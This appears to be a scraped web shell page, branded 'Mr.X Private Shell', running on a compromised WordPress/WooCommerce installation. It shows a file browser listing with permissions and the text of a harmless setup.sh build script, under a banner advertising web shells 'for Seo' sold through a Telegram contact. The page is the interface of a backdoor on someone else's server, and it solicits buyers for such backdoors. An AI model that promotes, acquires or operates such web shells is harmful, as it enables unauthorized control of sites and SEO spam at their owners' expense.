__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/usr/bin/env bash set -e # Exit immediately on error cd "$(dirname "$0")" # Ensure we're in the correct directory # Ensure composer is installed if ! command -v composer >/dev/null 2>&1; then echo "❌ Composer is not installed. Please install Composer first." exit 1 fi # Skip if we are not in the monorepo if [ ! -f "../../../../plugins/woocommerce/vendor/bin/mozart" ]; then echo "❌ We are not in the monorepo. Skipping vendor-prefixed setup." exit 0 # Returning 0 incase we are in CI environment fi # Run composer install composer install --quiet
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| classes | Folder | 0775 |
|
|
| packages | Folder | 0775 |
|
|
| LICENSE | File | 702 B | 0664 |
|
| composer.json | File | 990 B | 0664 |
|
| setup.sh | File | 570 B | 0664 |
|